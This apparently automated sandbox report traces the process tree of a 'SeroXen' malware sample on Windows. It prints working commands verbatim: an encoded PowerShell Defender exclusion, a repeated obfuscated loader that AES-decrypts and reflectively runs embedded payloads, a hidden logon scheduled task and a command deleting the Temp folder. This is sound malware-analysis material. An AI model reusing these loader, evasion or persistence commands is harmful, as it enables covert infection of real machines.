C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:23⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\SeroXen\" -spe -an -ai#7zMap19308:94:7zEvent325812⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAegBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZABuACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Uni.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Windows\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_215_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.vbs"5⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.bat" "6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); 
"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAegBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZABuACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Uni.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Windows\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_199_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.vbs"5⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.bat" "6⤵
-
Process (depth 7): C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
-
Process (depth 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
- Command and Scripting Interpreter: PowerShell
-
Process (depth 3): C:\Users\Admin\AppData\Local\Temp\SeroXen.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"
- Checks computer location settings
- Executes dropped EXE
-
Process (depth 4): C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 4 > nul & taskill /F /IM "SeroXen.exe" & taskill /F /IM "SeroXen HWID Reset.exe" & taskill /F /IM "SeroXen Toolkit.exe" & rmdir /s /q %userprofile%\AppData\Local\SeroXen & rmdir /s /q %userprofile%\AppData\Local\SeroXen & del /f %userprofile%\Desktop\SeroXen.lnk & taskkill /F /IM "SeroXen.exe" & taskkill /F /IM "SeroXen HWID Reset.exe" & taskkill /F /IM "SeroXen Toolkit.exe" & rmdir /s /q "C:\Users\Admin\AppData\Local\Temp" & rmdir /s /q "C:\Users\Admin\AppData\Local\Temp" & exit
-
Process (depth 5): C:\Windows\system32\PING.EXE
Command line: ping 127.0.0.1 -n 4
- Runs ping.exe
-
Process (depth 5): C:\Windows\system32\taskkill.exe
Command line: taskkill /F /IM "SeroXen.exe"
- Kills process with taskkill
-
Process (depth 5): C:\Windows\system32\taskkill.exe
Command line: taskkill /F /IM "SeroXen HWID Reset.exe"
- Kills process with taskkill
-
Process (depth 5): C:\Windows\system32\taskkill.exe
Command line: taskkill /F /IM "SeroXen Toolkit.exe"
- Kills process with taskkill
-
Process (depth 2): C:\Windows\system32\NOTEPAD.EXE
Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\SeroXen\README.txt
- Opens file in notepad (likely ransom note)
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
-
Process (depth 1): C:\Windows\System32\svchost.exe
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- Modifies data under HKEY_USERS
-
Process (depth 1): C:\Windows\System32\svchost.exe
Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
-
Process (depth 1): C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:8
-
Process (depth 1): C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
Command line: "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
-
Process (depth 1): C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads